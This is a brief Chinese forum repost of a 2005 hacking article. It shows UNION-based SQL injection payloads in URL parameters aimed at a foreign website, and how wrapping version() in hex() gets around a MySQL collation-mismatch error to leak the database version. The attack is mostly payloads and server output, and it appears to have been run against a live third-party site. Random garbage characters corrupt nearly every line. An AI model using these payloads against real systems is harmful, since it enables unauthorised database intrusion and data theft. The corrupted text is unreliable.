本文作者:SuperHei
' n) F, X. A* l+ U6 N1 z5 s文章性质:原创
$ W/ C. w' B3 X b- @6 Z发布日期:2005-10-18
6 Y$ N; K; R6 M, J0 m测试个国外的站时:. C2 T: o& f% S) G- m5 @4 Y
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*- X5 z1 Q. y) T/ M. H5 M
返回错误:* Y7 a' I: o! ^, P% t
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
& U) D3 J0 v fMySQL Error No. 126
1 R, @2 P8 _- |5 j0 I看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
; [, m2 e: a- O3 w! Q: Q解决办法:转为其他编码如hex。& m. t, H8 D3 A+ K5 n. x+ h
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
# g9 p, O7 J+ q成功得到hex(version())的值为:
2 h7 ] u* @' G342E312E332D62657461
% E4 k$ r& {5 Z7 @& y4 O# N2 x回Mysql查询下得到:
2 h( A3 w! T1 e. `( C0 bmysql> select 0x342E312E332D62657461;
3 m+ J1 W2 y7 X+------------------------+
7 s/ j2 Q+ p9 H* a, M2 s/ `( c: i| 0x342E312E332D62657461 |
4 {) G& c$ \) V5 Y6 V+------------------------+
; ~! N7 {) x0 D) u| 4.1.3-beta |
* Y/ y- y2 K$ Q+------------------------+/ `$ h) o+ a+ i5 e( b. ]: \
1 row in set (0.00 sec)
, p: a2 d/ |) `
2 A9 ~, |4 C4 q* [, b s |
发表于 2012-9-15 14:04:54
收藏
支持
反对